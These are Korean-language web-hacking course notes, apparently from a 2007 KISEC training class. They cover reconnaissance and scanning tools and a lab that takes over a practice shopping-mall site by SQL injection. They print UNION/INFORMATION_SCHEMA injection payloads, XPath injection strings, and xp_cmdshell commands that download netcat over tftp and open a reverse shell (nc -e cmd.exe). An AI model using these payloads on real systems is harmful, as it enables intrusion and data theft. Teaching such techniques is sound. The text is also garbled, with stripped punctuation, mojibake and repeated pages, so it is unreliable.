ICMP TTL๊ฐ’์„ ์กฐ์ ƒํ•ด๊ฐ€๋ฉฐ ์›น ์„œ๋ฒ„ ํƒ์ง€

netcraftcom

Stealth Scan-sS

Normal Scan-sT-sU

Network Services Version Scan-sV

OSDetection-O-A

DoNotPing_P0

Idle scan

IDS์šฐํšŒ

httpunicornscanorg

Unicorn scan -mT -p -v -r 2501921681024q

Unicornscan

Nc

jikto

Port Scan(Port Mapping)

httTrack

Web Site Mirroring

kisec ์›นํ•ดํ‚น ๋…ธํŠธํ•„๊ธฐ ํŽ˜์ด์ง€ 11

-grepegrep awksedsortuniq(moreheadless)๋“ฑ ํ™œ์šฉ

Mirroring ํ›„ ์ •์  ๋ถ„์„

balckwindow

InteliTamper

Wikto

Web๊ตฌ์กฐ ๋ถ„์„(๋ฐ˜์ž๋™)

Httpwatch

TamperlE

Cooxie

LiveHttpHeaders(firefox)

Command line tool(nccurlopenssl)

Manual Analysis

ParosWebscrabFidderBurpIntruder

SoftwareProxy

Web๊ตฌ์กฐ๋ถ„์„(์ˆ˜์ž‘์—…)

๊ด€๋ฆฌ์žํŽ˜์ด์ง€

์ž๋ฃŒ์‹ค(web shell)

ํ†ต๊ณ„ ์ƒํƒœ ํŽ˜์ด์ง€

ํšŒ์›๋“ฑ๋ก์šฐํŽธ๋ฒˆํ˜ธ ์กฐํšŒ(์ธ์ ์…˜๊ณต๊ฒฉ)

(์ธ์ ์…˜์€ ์ž…๋ ฅ๊ฐ’์„ ๋„ฃ์—ˆ์„๋•Œ ๊ฒฐ๊ณผ๋ฅผ ๋ฟŒ๋ ค์ฃผ๋Š” ํŽ˜์ด์ง€๋ฅผ ์ฐพ์•„์•ผํ•š๋‹ค)์•†๋ณด์—ฌ์ฃผ๋Š”๊ฑด ๋ธ”๋ผ์ธ๋“œ ์ธ์ ์…˜

์•”ํ˜ธ๋ถ„์‹ค(์•”ํ˜ธ ํš๋“ ์ˆ˜์›”)

์ •๋ณด์ˆ˜์ •(์ˆ˜ํ‰์ˆ˜์ง์ƒ์Šน๊ธฐํšŒ)

ํšŒ์›๊ฐ€์ž…ํŽ˜์ด์ง€

๊ฒฐ์ œ ํŽ˜์ด์ง€

Basic Banner Garbbing

Http resonse ํ—ค๋” ์ˆš์„œ

Http resonse ํ—ค๋” ์กด์žฌ ์œ ๋ฌด

Http resonse ํ—ค๋”์˜ ํŠน์ • ๊ฐ’

Tracehead ๋“ฑ์— ๋Œ€ํ•š ์ƒ์ดํ•š ์‘๋‹ต

๋ฐ์ดํ„ฐ์—†์ด ์ ‚์†กํ•š put์— ๋Œ€ํ•š์‘๋‹ต

kisec ์›นํ•ดํ‚น ๋…ธํŠธํ•„๊ธฐ ํŽ˜์ด์ง€ 12

Tracehead ๋“ฑ์— ๋Œ€ํ•š ์ƒ์ดํ•š ์‘๋‹ต

๋ฐ์ดํ„ฐ์—†์ด ์ ‚์†กํ•š put์— ๋Œ€ํ•š์‘๋‹ต

Unexpercted Method ์ ‚์†ก

๋™์ผ์š”์ฒญ ๋ฐ˜๋ณต ์ ‚์†ก

์ทจ์•ฝ์  ์Šค์บ”(system)

Xscan

Nessus

n-stealth security scanner

์ทจ์•ฝ์  ์Šค์บ”(Web Server amp WAS amp Web App)

APP SCANNER

ACUNETIX

NSTALKER SCANNER

์Šค์บ” ISSUE

BASIC DIGEST NTML CERT

FORM-BASED

์ธ์ฆ์ •๋ณด ์„ค์ •

์Šค์บ” ๊ฐ•๋„(๋ฉ€ํ‹ฐ ์ปค๋„ฅ์…˜ ํƒ€์ž„์•„์›ƒ ๊ณต๊ฒฉ๋ชจ๋“œ๋น„๊ณต๊ฒฉ๋ชจ๋“œ)

๋ถ„์„

์˜๋ฏธ์žˆ๋Š” ์ •๋ณด๋กœ ๊ฐ€๊ณต

ACCOUNT ์ˆ˜์ง‘

OS์ •๋ณด์— ๋”ฐ๋ฅธ ์ทจ์•ฝ์  ์ˆ˜์ง‘

ํฌํŠธ๋ณ„ ์„œ๋น„์Šค ์ทจ์•ฝ์ 

์›น์„œ๋ฒ„ ์ ‚์ฒด๊ตฌ์กฐ ๋ถ„์„

์ฃผ์„

ํžˆ๋“ž ํ•„๋“œ

์†Œ์Šค๋ถ„์„

์ฟ ํ‚ค๋ถ„์„

์„ธ์…˜ID์ƒ์„ฑ ์ทจ์•ฝ์  ๋ถ„์„

๊ณต๊ฒฉ

์ •๋ณด์— ๊ทบ๊ฑฐํ•š ๊ณต๊ฒฉ

๋ฌด์ž‘์œ„ ๊ณต๊ฒฉ

์‚ฌ์ ‚๊ณต๊ฒฉ

๊ณต๊ฒฉ์ดˆ์ 

์ˆ˜์ง‘๋œ ACCOUNT ์ •๋ณด๋ฅผ์ด์šฉ

OSNETWORK SERVICE ๊ณต๊ฒฉ

WEBSERVER WEBAPP SERVER WEBAPPLICATION

SQLISCANNER

๊ถŒํ•š ์ƒ์Šน

์ˆ˜ํ‰

ํšŒ์›์ •๋ณด ์ˆ˜์ •

Cookie Stealing

CSRF

์ˆ˜์ง

CSRF

CSRF๋ฅผ ํ†ตํ•ด DMZ์˜์—ญ์— ์ ‘์†ํ•š ๊ด€๋ฆฌ์ž์—๊ฒŒ ๋‚ด๋ถ€ ZONE์ชฝ์œผ๋กœ ๊ฐ•์ œ REQEUST๋ฅผ ํ•˜๋„๋ก ์กฐ์ž‘ ๊ฐ€๋Šฅ

kisec ์›นํ•ดํ‚น ๋…ธํŠธํ•„๊ธฐ ํŽ˜์ด์ง€ 13

์ ‚์ œ์กฐ๊ฑด์€ ๋‚ด๋ถ€๋ง์˜ IP APPLICATION PARAMETERS ๋ฅผ ๋ชจ๋‘ ์•Œ๊ณ  ์žˆ์„ ๊ฒฝ์šฐ

CSRF๋ฅผ ํ†ตํ•ด DMZ์˜์—ญ์— ์ ‘์†ํ•š ๊ด€๋ฆฌ์ž์—๊ฒŒ ๋‚ด๋ถ€ ZONE์ชฝ์œผ๋กœ ๊ฐ•์ œ REQEUST๋ฅผ ํ•˜๋„๋ก ์กฐ์ž‘ ๊ฐ€๋Šฅ

OWASPWASC

์ˆ˜์ž‘์—…

์›น ์–ดํ”Œ๋ฆฌ์ผ€์ด์…˜ ์ทจ์•ฝ์  ๊ณต๊ฒฉ

์œ„ํ—˜๋„์— ๋”ฐ๋ผ ๊ณต๊ฒฉ

๊ฐ€์šฉ์„ฑ์„ ๋–จ์–ดํŠธ๋ฆฌ๋Š” ๊ณต๊ฒฉ์ œ์™ธ

์„œ๋ฒ„์˜ shellํš๋“ or๊ด€๋ฆฌ์ž ์•”ํ˜ธ ํš๋“

๋ฐ์ดํ„ฐ ์—ด๋žŒ ํ—ˆ์šฉ๊ธˆ์ง€

Ethical Hacking์ธ ๊ฒฝ์šฐ ๊ณ ๊ฐ์˜ ์š”๊ตฌ์‚ฌํ•ญ ๋ฐ˜์˜

์˜คํƒ์ œ๊ฑฐ

์›น ์ทจ์•ฝ์  ์Šค์บ๋„ˆ ๊ฒฐ๊ณผ ๋ถ„์„

ONE WAY WEB HACKING ์ฝ์–ด๋ณด๊ธฐ

kisec ์›นํ•ดํ‚น ๋…ธํŠธํ•„๊ธฐ ํŽ˜์ด์ง€ 14

SQL INJECTION

GETPOST ํŒŒ๋ผ๋ฏธํ„ฐ HTTP REQUEST ํŒŒ๋ผ๋ฏธํ„ฐ ์ฟ ํ‚ค ๊ฐ’

๊ธฐํƒ€ ์„œ๋ฒ„์—์„œ ์ฒ˜๋ฆฌํ•˜๋Š” ๋ชจ๋“ž ํด๋ผ์ด์–ถํŠธ ๊ฐ’

ํด๋ผ์ด์–ถํŠธ ์ž…๋ ฅ ๊ฐ’ ์œ ํ˜•

ํด๋ผ์ด์–ถํŠธ์—์„œ ์ž…๋ ฅ๋œ ๊ฐ’์ด ์œ ํšจ์„ฑ ๊ฒ€์ฆ๊ณผ์ • ์—†์ด sql ๋ฌธ์— ํฌํ•จ๋˜๋Š” ๊ฒฝ์šฐ

MAIN CAUSE

Impact

์ธ์ฆ์šฐํšŒ

๋ฐ์ดํ„ฐ๋ฒ ์ด์Šค ๋คํ”„ ์กฐ์ž‘ ์ƒ์„ฑ ํŒŒ๊ดด

DML D์ด ๋“ฑ ์ƒ์ƒํ•› ์ˆ˜ ์žˆ๋Š” ๋ชจ๋“ž ์ž‘์—…

๋ฐ์ดํ„ฐ๋ฒ ์ด์Šค ์ปจํŠธ๋กค

์‹œ์Šคํ…œ ๋ช…๋ น์–ด ์‹คํ–‰

COUNTERMEASURE

์ž…๋ ฅ๊ฐ’ ๊ฒ€์ฆ

์ตœ์†Œ๊ถŒํ•š ๋ถ€์—ฌ(SYSTEMDBMSDatabase)

์ธ์ฆ์šฐํšŒ

์ธ๊ฐ€๋œ ์‚ฌ์šฉ์ž์˜ ID PW ๋ฅผ ์ž…๋ ฅํ•˜์ง€ ์•Š๊ณ ๋„ ์ธ์ฆ์„ ์šฐํšŒํ•˜๋Š” ํ–‰์œ„

ID PW๋ฅผ ๋ชจ๋ฅด๋Š” ์ƒํƒœ์—์„œ๋„ ์ ์ ƒํžˆ ๊ตฌ์„ฑ๋œ ๋ฌธ์ž์—ด์„ ์ž…๋ ฅํ•˜์—ฌ ์ธ์ฆ์„ ์šฐํšŒํ•˜๋Š” ๊ฒƒ์ด ๊ฐ€๋Šฅ

์ž…๋ ฅ๋œ ๋ฌธ์ž์—ด์€ SQL ๋ฌธ์˜ ์ผ๋ถ€๋กœ ์‚ฝ์ž…์ด ๋˜์–ด ์‹คํ–‰๋จ

์ธ์ฆ ์šฐํšŒ์— ์‚ฌ์šฉ๋˜๋Š” ์ž…๋ ฅ๊ฐ’์€

๋ฌธ๋ฒ•์ƒ ์˜ค๋ฅ˜๋ฅผ ์‹œํ‚ค์ง€ ์•Š์•„์•ผ ํ•จ

WHERE์ ƒ์˜ ์กฐ๊ฑด์ด ํ•ญ์ƒ ์ฐธ์ด ๋˜๋„๋ก ์กฐ์ž‘

์›น ์• ํ”Œ๋ฆฌ์ผ€์ด์…˜์˜ ์ผ๋ฐ˜์ ์ธ ์ธ์ฆ ์ ƒ์ฐจ

1IDPW ์ž…๋ ฅ

2SQL Query ์ƒ์„ฑ

3DATABASE์— ์ฟผ๋ฆฌ ์ ‚์†ก

4DATABASE์—์„œ ์ฟผ๋ฆฌ๋ฌธ ์‹คํ–‰

5๋ฐ˜ํ™˜๋˜๋Š” RETURN๊ฐ’์— ๋”ฐ๋ผ ์ธ์ฆ์—ฌ๋ถ€ํŒ๋‹จ

SQL INJECTION ์ ƒ์ฐจ

DB ์Šคํ‚ค๋งˆํŒŒ์•… (DBTABLECOLUMN ํ™˜๊ฒฝ์ •๋ณด๋“ฑ ํŒŒ์•…

๋ฐ์ดํ„ฐ๋ฒ ์ด์Šค ์ด๋ฆ„ ํŒŒ์•…

ํ…Œ์ด๋ธ”์ด๋ฆ„ ํŒŒ์•…

์ปฌ๋Ÿผ์ด๋ฆ„ ํŒŒ์•…

๋ชจ๋“ž SQL INJECTION์€ ์ž…๋ ฅ๊ฐ’์— ๋Œ€ํ•š ์œ ํšจ์„ฑ ๊ฒ€์ฆ์„ ํ•˜์ง€ ์•Š๊ธฐ ๋•Œ๋ฌธ์— ๋ฐœ์ƒํ•š๋‹ค ์—๋Ÿฌ๋ฅผ ์œ ๋„ํ•˜์—ฌ ํ•„๋“œ์˜ ์ •๋ณด๋ฅผ ๋ˆ„์ถœ์‹œํ‚จ๋‹ค

DBMS ๊ฐ€ ์ ์ ƒํ•š ๊ถŒํ•š์„ ๊ฐ€์ง€๊ณ  ์žˆ๋Š” ๊ฒฝ์šฐ ๋ ˆ์ง€์ŠคํŠธ๋ฆฌ์— ์ ‘๊ทบํ•˜๋Š” ๊ฒƒ์ด ๊ฐ€๋Šฅ

DBMS๊ฐ€ ์ ์ ƒํ•š ๊ถŒํ•š์„ ๊ฐ€์ง€๊ณ  ์žˆ๋Š” ๊ฒฝ์šฐ ์ฟผ๋ฆฌ๋ฅผ ํ†ตํ•š ์„œ๋น„์Šค ์ œ์–ด๊ฐ€ ๊ฐ€๋Šฅ

OYES MALL (SQL INJECTION์„ ์ด์šฉํ•š ๊ด€๋ฆฌ์ž ๊ถŒํ•š ํš๋“ ์‹ค์Šต

ํ™˜๊ฒฝ์€(2000ASPMS-SQL2000)

์ค€๋น„๋œ ์‡ผํ•‘๋ชฐ์ด๋‹ค

์ฒซ๋ฒˆ์งธ ๋ฐฉ๋ฒ•

Web Hacking 3์ผ์ฐจ

2007๋…„ 10์›” 25์ผ ๋ชฉ์š”์ผ

์˜ค์ ‚ 1200

kisec ์›นํ•ดํ‚น ๋…ธํŠธํ•„๊ธฐ ํŽ˜์ด์ง€ 15

group by(user_id) -- ๋ฅผ ์ด์šฉํ•ด ํ…Œ์ด๋ธ”์„ ์•Œ์•„๋‚ธ๋‹ค

Member ํ…Œ์ด๋ธ”์•†์—์žˆ๋Š” num์ด๋ผ๋Š” ์ปฌ๋Ÿผ์„ ํ† ํ•ด๋ƒˆ๋‹ค

kisec ์›นํ•ดํ‚น ๋…ธํŠธํ•„๊ธฐ ํŽ˜์ด์ง€ 16

union select from members where user_id like o ํ•ด๋ด๋ผ ๋กœ๊ทธ์ธ ๋ ๊ฑฐ๋‹ค

๋‘๋ฒˆ์งธ ๋ฐฉ๋ฒ•

์ฃผ์†Œ๋ก์กฐํšŒ ๋ถ€๋ถ„์— SQL INJECTION์„ ํ•˜์˜€๋‹ค

$UNION SELECT 1234TABLE_NAME FROM INFORMATION_SCHEMATABLES-- ์™€๊ฐ™์ด ์งˆ์˜๋ฅผ ํ•˜๋ฉด ํ† ํ•ด๋‚ธ๋‹ค

kisec ์›นํ•ดํ‚น ๋…ธํŠธํ•„๊ธฐ ํŽ˜์ด์ง€ 17

์šฐ๋ฆฌ๋Š” members ๋ผ๋Š” ํ…Œ์ด๋ธ”์ด ์กด์žฌํ•˜๋Š” ๊ฒƒ์„ ๋ณผ์ˆ˜ ์žˆ์„ ๊ฒƒ์ด๋‹ค

$UNION SELECT 1234 COLUMN_NAME FROM INFORMATION_SCHEMACOLUMNS WHERE TABLE_NAME= members --

Members์— ๋Œ€ํ•š ์ปฌ๋Ÿผ์„ ํ† ํ•ด๋‚ธ๋‹ค

$ or 1=(select top 1 user_id from members)--

User id์˜ ์ปฌ๋Ÿผ์— top 1 ์ธ๊ฒƒ์„ ํ† ํ•ด๋‚ธ๋‹ค

union select 1234 user_idpasswd from members where user_id=oyes --

kisec ์›นํ•ดํ‚น ๋…ธํŠธํ•„๊ธฐ ํŽ˜์ด์ง€ 18

์œผ์•„~password ๊ฐ€ oyesmall ์ด๋ผ๋„ค ์‹ค์Šต ๋

File Uploading

$$ exec masterxp_cmdshell tftp -i 2112406869 get ncexe nc2000exe --

$$ exec masterxp_cmdshell nc1000exe 2112406877 7777 -e cmdexe --

์•„์ฃผ ๊ฐ„๋‹จํ•˜๋‹ค

$$ exec masterxp_cmdshell tftp -i 2112406869 get ncexe nc6249exe ampamp nc -e cmdexe 2112406877 6249 --

kisec ์›นํ•ดํ‚น ๋…ธํŠธํ•„๊ธฐ ํŽ˜์ด์ง€ 19

XML ํŠน์ง•

๋ฌธ์„œ์˜ ๋‚ด์šฉ๊ณผ ๋””์ž์ธ์ด ์™„์ ‚ํžˆ ๋ถ„๋ฆฌ

๋ฌธ์„œ๊ตฌ์กฐ๋Š” XML๋กœ ํ”„๋ฆฌ์ žํ…Œ์ด์…˜์€ XSL์„ ํ†ตํ•ด

๋‹ค์–‘ํ•š ๋ฐฉ์‹์˜ ๋งํฌ ๊ธฐ๋Šฅ ์ œ๊ณต

ํ‘œ์ค€ํ™”๋œ DTD์„ ํ†ตํ•ด ๋ชจ๋“ž ๋ถ„์•ผ์— ์‚ฌ์šฉ๊ฐ€๋Šฅ

DOM(Document Object Model)

SAX(Simple API for XML)

XML๊ตฌ์กฐ2๊ฐ€์ง€ ๋Œ€ํ‘œ์  ๋ชจ๋ธ์กด์žฌ

๊ตฌ์„ฑ์š”์†Œ ์„ค๋ช…

์—˜๋ฆฌ๋จผํŠธ ๋งˆํฌ์—… ํƒœ๊ทธ์™€ ๊ทธ ์•†์— ํฌํ•จ๋œ ๋‚ด์šฉ

๋นˆ ์—˜๋ฆฌ๋จผํŠธ ๋‚ด์šฉ์„ ํฌํ•จํ•˜์ง€ ์•Š๋Š” ๋นˆ ์—˜๋ฆฌ๋จผํŠธ

๋ฃจํŠธ ์—˜๋ฆฌ๋จผํŠธ ๋ฌธ์„œ๋‚ด ๋ชจ๋“ž ์—˜๋ฆฌ๋จผํŠธ์™€ ๋‚ด์šฉ์„ ํฌํ•จํ•˜๊ณ  ์žˆ๋Š” XML ๋ฌธ์„œ์˜ ์—˜๋ฆฌ๋จผํŠธ

์†์„ฑ ์—˜๋ฆฌ๋จผํŠธ์— ํฌํ•จ๋˜์–ด ์ถ”๊ฐ€์ ์ธ ์ •๋ณด๋ฅผ ์ œ๊ณต

ltimg src=balbalbalgtbalbalballtimggt

์—”ํ‹ฐํ‹ฐ ํ…์ŠคํŠธ ๋ฐ”์ด๋„ˆ๋ฆฌ๋ฐ์ดํ„ฐ ๋น„ ์•„์Šคํฌ ๋ฌธ์ž๋ฅผ ์ €์žฅํ•˜๋Š”๋ฐ ์‚ฌ์šฉ

์ฒ˜๋ฆฌ๋ช…๋ น ์ ‚์ฒด ๋ฌธ์„œ๋‚˜ ๋ฌธ์„œ์˜ ์ผ๋ถ€๋ฅผ ์ฒ˜๋ฆฌํ•˜๋Š” ์‘์šฉํ”„๋กœ๊ทธ๋žจ๊ณผ ์—ฐ๊ฒฐํ•ด ์ฃผ๋Š” ๋ช…๋ น์–ด lt gt

์ฃผ์„ XML ํ”„๋กœ์„ธ์„œ๊ฐ€ ํ•ด์„ํ•˜์ง€ ์•Š๋Š” ์„ค๋ช…๋ฌธ

lt-- --gt

CDATA์„น์…˜ ํŠน์ˆ˜ํ•š ๋ฌธ์ž๋ฅผ ์ผ๋ฐ˜ ํ…์ŠคํŠธ๋กœ ์ธ์‹ํ•˜๋„๋ก ํ•˜๋Š” ํ‘œ๊ธฐ๋ฒ•

lt[CDATA[hellipstring]]gt

Xpath

Xml ๋ฌธ์„œ์— ๋Œ€ํ•š ์งˆ์˜์–ถ์–ด

SQL๋ฌธ์€ ํŠน์ • ํ…Œ์ด๋ธ”์˜ ํ–‰๊ณผ ์—ด์„ ์„ ํƒ

Xpath๋Š” ํŠน์ • XML๋ฌธ์„œ์˜ ๋…ธ๋“œ์™€ ๋…ธ๋“œ์…‹์„ ์„ ํƒ

๊ด€๋ ฆ Issue

์˜ˆ)bookbook[ISBN=1111 or 1=1]

๋ชจ๋“ž book ๋…ธ๋“œ๋“ค์— ์ ‘๊ทบ๊ฐ€๋Šฅ

Xpath๊ณต๊ฒฉ

๋Œ€ํ˜• ํŽ˜์ด๋กœ๋“œ ๊ณต๊ฒฉ(like DOS)

XML์˜ ๋…ธ๋“œ์™€ ์†์„ฑ์ด ์ค‘์ฒฉ ์„ ์–ถ๋  ์ˆ˜ ์žˆ๋‹ค๋Š” ์ ์„ ์•…์šฉ

ํŠน์ • ๋…ธ๋“œ์•†์— ๋™์ผ ๋…ธ๋“œ๋ช… ๋ฐ˜๋ณต์„ ์–ถ์†์„ฑ ๋ฌดํ•š์„ ์–ถ

์žฌ๊ท€ ํŽ˜์ด๋กœ๋“œ ๊ณต๊ฒฉ

`or loginid(nodeLoginID())=LoginID or a=b

07๋…„ ํ•ดํ‚น๋ฐฉ์–ด๋Œ€ํšŒ๋ฌธ์ œ

WebService

์ •์˜๋„คํŠธ์›Œํฌ์ƒ์—์„œ ์ ‘๊ทบ ๊ฐ€๋Šฅํ•š ์†Œํ”„ํŠธ์›จ์–ด ๊ธฐ๋Šฅ๋‹จ์œ„๋กœ ํ”Œ๋žซํผ ํ”„๋กœ๊ทธ๋ž˜๋ฐ ์–ถ์–ด ๋ฐ ์ปดํฌ๋„ŒํŠธ ๋ชจ๋ธ์— ๋…

๋ฆฝ์ ์ธ ๊ธฐ์ˆ ๋กœ ๋งŒ๋“ค์–ด์ง‚ ์†Œํ”„ํŠธ์›จ์–ด

์›น ํ•ดํ‚น ๊ณต๊ฒฉ ์ ƒ์ฐจ

FootPrinting Scanning Enumeration

PllferingEscalatingPrivledge

GainingAccess

CreatingBack Doors

CoveringTracks

Web Hacking 2์ผ์ฐจ

2007๋…„ 10์›” 23์ผ ํ™”์š”์ผ

์˜ค์ ‚ 934

kisec ์›นํ•ดํ‚น ๋…ธํŠธํ•„๊ธฐ ํŽ˜์ด์ง€ 9

์›น ํ•ดํ‚น ๊ณต๊ฒฉ ์ ƒ์ฐจ

FootPrinting Scanning Enumeration

PllferingEscalatingPrivledge

GainingAccess

CreatingBack Doors

CoveringTracks

๊ณต๊ฒฉ์ ƒ์ฐจ

์ •๋ณด์ˆ˜์ง‘

Profiling

๋ถ„์„

Analysis

๊ณต๊ฒฉ

AttackEcploit

hellip

์‚ฌํšŒ๊ณตํ•™

๊ฒ€์ƒ‰์—”์ง‚

FootPrinting

PortScan

Web Site ๋ฏธ๋Ÿฌ๋ง

Web ๊ตฌ์กฐ๋ถ„์„

์˜๋ฏธ์žˆ๋Š” ์ •๋ณด๋กœ ๊ฐ€๊ณต

Account ์ˆ˜์ง‘

OS์ •๋ณด์ทจ์•ฝ์ 

ํฌํŠธ๋ณ„์„œ๋น„์Šค์ทจ์•ฝ์ 

์ ‚์ฒด๊ตฌ์กฐ์†Œ์Šค์ฃผ์„

์ฟ ํ‚ค๋“ฑ ๋ถ„์„

์ •๋ณด์— ๊ทบ๊ฑฐํ•š ๊ณต๊ฒฉ

BF Guessing

OSNetwork Service

Exploitation

๊ถŒํ•š์ƒ์Šน

OWASPWASC๋“ฑ์— ์˜ํ•š ๊ณต๊ฒฉ

๋ณด๊ณ ์„œ

1์ •๋ณด์ˆ˜์ง‘

์‚ฌํšŒ๊ณตํ•™

๋„๋ฉ”์ธ ์ •๋ณด IP Block ์ •๋ณด

Whois

Dig

Whosip

Netcraft

๊ธฐ๋ณธ์ •๋ณด

httpwebarchiveorg

Google Cache

Web Archive

httpjohnnyihackstuffcom

์‹ฌ์ •์žฌ(googledorkpdf)

Google Dork

Google hacking DB ์‚ฌ์šฉ

Google API Key(ํ‚ค ๋ฐœ๊ธ‰ ํ์ง€)

SiteDigger Wikto

๊ฒ€์ƒ‰์—”์ง‚(No-Tech Hacking)

๊ตฌ๊ธ€ ํ•ดํ‚น ํ‚ค์›Œ๋“œ ์ œ๊ณต ์‚ฌ์ดํŠธ

Footprinting Web Server

kisec ์›นํ•ดํ‚น ๋…ธํŠธํ•„๊ธฐ ํŽ˜์ด์ง€ 10

AFD(Acitive Filter Detection)

ICMP TTL๊ฐ’์„ ์กฐ์ ƒํ•ด๊ฐ€๋ฉฐ ์›น ์„œ๋ฒ„ ํƒ์ง€

netcraftcom

Stealth Scan-sS

Normal Scan-sT-sU

Network Services Version Scan-sV

OSDetection-O-A

DoNotPing_P0

Idle scan

IDS์šฐํšŒ

httpunicornscanorg

Unicorn scan -mT -p -v -r 2501921681024q

Unicornscan

Nc

jikto

Port Scan(Port Mapping)

httTrack

Web Site Mirroring

kisec ์›นํ•ดํ‚น ๋…ธํŠธํ•„๊ธฐ ํŽ˜์ด์ง€ 11

-grepegrep awksedsortuniq(moreheadless)๋“ฑ ํ™œ์šฉ

Mirroring ํ›„ ์ •์  ๋ถ„์„

balckwindow

InteliTamper

Wikto

Web๊ตฌ์กฐ ๋ถ„์„(๋ฐ˜์ž๋™)

Httpwatch

TamperlE

Cooxie

LiveHttpHeaders(firefox)

Command line tool(nccurlopenssl)

Manual Analysis

ParosWebscrabFidderBurpIntruder

SoftwareProxy

Web๊ตฌ์กฐ๋ถ„์„(์ˆ˜์ž‘์—…)

๊ด€๋ฆฌ์žํŽ˜์ด์ง€

์ž๋ฃŒ์‹ค(web shell)

ํ†ต๊ณ„ ์ƒํƒœ ํŽ˜์ด์ง€

ํšŒ์›๋“ฑ๋ก์šฐํŽธ๋ฒˆํ˜ธ ์กฐํšŒ(์ธ์ ์…˜๊ณต๊ฒฉ)

(์ธ์ ์…˜์€ ์ž…๋ ฅ๊ฐ’์„ ๋„ฃ์—ˆ์„๋•Œ ๊ฒฐ๊ณผ๋ฅผ ๋ฟŒ๋ ค์ฃผ๋Š” ํŽ˜์ด์ง€๋ฅผ ์ฐพ์•„์•ผํ•š๋‹ค)์•†๋ณด์—ฌ์ฃผ๋Š”๊ฑด ๋ธ”๋ผ์ธ๋“œ ์ธ์ ์…˜

์•”ํ˜ธ๋ถ„์‹ค(์•”ํ˜ธ ํš๋“ ์ˆ˜์›”)

์ •๋ณด์ˆ˜์ •(์ˆ˜ํ‰์ˆ˜์ง์ƒ์Šน๊ธฐํšŒ)

ํšŒ์›๊ฐ€์ž…ํŽ˜์ด์ง€

๊ฒฐ์ œ ํŽ˜์ด์ง€

Basic Banner Garbbing

Http resonse ํ—ค๋” ์ˆš์„œ

Http resonse ํ—ค๋” ์กด์žฌ ์œ ๋ฌด

Http resonse ํ—ค๋”์˜ ํŠน์ • ๊ฐ’

Tracehead ๋“ฑ์— ๋Œ€ํ•š ์ƒ์ดํ•š ์‘๋‹ต

๋ฐ์ดํ„ฐ์—†์ด ์ ‚์†กํ•š put์— ๋Œ€ํ•š์‘๋‹ต

kisec ์›นํ•ดํ‚น ๋…ธํŠธํ•„๊ธฐ ํŽ˜์ด์ง€ 12

Tracehead ๋“ฑ์— ๋Œ€ํ•š ์ƒ์ดํ•š ์‘๋‹ต

๋ฐ์ดํ„ฐ์—†์ด ์ ‚์†กํ•š put์— ๋Œ€ํ•š์‘๋‹ต

Unexpercted Method ์ ‚์†ก

๋™์ผ์š”์ฒญ ๋ฐ˜๋ณต ์ ‚์†ก

์ทจ์•ฝ์  ์Šค์บ”(system)

Xscan

Nessus

n-stealth security scanner

์ทจ์•ฝ์  ์Šค์บ”(Web Server amp WAS amp Web App)

APP SCANNER

ACUNETIX

NSTALKER SCANNER

์Šค์บ” ISSUE

BASIC DIGEST NTML CERT

FORM-BASED

์ธ์ฆ์ •๋ณด ์„ค์ •

์Šค์บ” ๊ฐ•๋„(๋ฉ€ํ‹ฐ ์ปค๋„ฅ์…˜ ํƒ€์ž„์•„์›ƒ ๊ณต๊ฒฉ๋ชจ๋“œ๋น„๊ณต๊ฒฉ๋ชจ๋“œ)

๋ถ„์„

์˜๋ฏธ์žˆ๋Š” ์ •๋ณด๋กœ ๊ฐ€๊ณต

ACCOUNT ์ˆ˜์ง‘

OS์ •๋ณด์— ๋”ฐ๋ฅธ ์ทจ์•ฝ์  ์ˆ˜์ง‘

ํฌํŠธ๋ณ„ ์„œ๋น„์Šค ์ทจ์•ฝ์ 

์›น์„œ๋ฒ„ ์ ‚์ฒด๊ตฌ์กฐ ๋ถ„์„

์ฃผ์„

ํžˆ๋“ž ํ•„๋“œ

์†Œ์Šค๋ถ„์„

์ฟ ํ‚ค๋ถ„์„

์„ธ์…˜ID์ƒ์„ฑ ์ทจ์•ฝ์  ๋ถ„์„

๊ณต๊ฒฉ

์ •๋ณด์— ๊ทบ๊ฑฐํ•š ๊ณต๊ฒฉ

๋ฌด์ž‘์œ„ ๊ณต๊ฒฉ

์‚ฌ์ ‚๊ณต๊ฒฉ

๊ณต๊ฒฉ์ดˆ์ 

์ˆ˜์ง‘๋œ ACCOUNT ์ •๋ณด๋ฅผ์ด์šฉ

OSNETWORK SERVICE ๊ณต๊ฒฉ

WEBSERVER WEBAPP SERVER WEBAPPLICATION

SQLISCANNER

๊ถŒํ•š ์ƒ์Šน

์ˆ˜ํ‰

ํšŒ์›์ •๋ณด ์ˆ˜์ •

Cookie Stealing

CSRF

์ˆ˜์ง

CSRF

CSRF๋ฅผ ํ†ตํ•ด DMZ์˜์—ญ์— ์ ‘์†ํ•š ๊ด€๋ฆฌ์ž์—๊ฒŒ ๋‚ด๋ถ€ ZONE์ชฝ์œผ๋กœ ๊ฐ•์ œ REQEUST๋ฅผ ํ•˜๋„๋ก ์กฐ์ž‘ ๊ฐ€๋Šฅ

kisec ์›นํ•ดํ‚น ๋…ธํŠธํ•„๊ธฐ ํŽ˜์ด์ง€ 13

์ ‚์ œ์กฐ๊ฑด์€ ๋‚ด๋ถ€๋ง์˜ IP APPLICATION PARAMETERS ๋ฅผ ๋ชจ๋‘ ์•Œ๊ณ  ์žˆ์„ ๊ฒฝ์šฐ

CSRF๋ฅผ ํ†ตํ•ด DMZ์˜์—ญ์— ์ ‘์†ํ•š ๊ด€๋ฆฌ์ž์—๊ฒŒ ๋‚ด๋ถ€ ZONE์ชฝ์œผ๋กœ ๊ฐ•์ œ REQEUST๋ฅผ ํ•˜๋„๋ก ์กฐ์ž‘ ๊ฐ€๋Šฅ

OWASPWASC

์ˆ˜์ž‘์—…

์›น ์–ดํ”Œ๋ฆฌ์ผ€์ด์…˜ ์ทจ์•ฝ์  ๊ณต๊ฒฉ

์œ„ํ—˜๋„์— ๋”ฐ๋ผ ๊ณต๊ฒฉ

๊ฐ€์šฉ์„ฑ์„ ๋–จ์–ดํŠธ๋ฆฌ๋Š” ๊ณต๊ฒฉ์ œ์™ธ

์„œ๋ฒ„์˜ shellํš๋“ or๊ด€๋ฆฌ์ž ์•”ํ˜ธ ํš๋“

๋ฐ์ดํ„ฐ ์—ด๋žŒ ํ—ˆ์šฉ๊ธˆ์ง€

Ethical Hacking์ธ ๊ฒฝ์šฐ ๊ณ ๊ฐ์˜ ์š”๊ตฌ์‚ฌํ•ญ ๋ฐ˜์˜

์˜คํƒ์ œ๊ฑฐ

์›น ์ทจ์•ฝ์  ์Šค์บ๋„ˆ ๊ฒฐ๊ณผ ๋ถ„์„

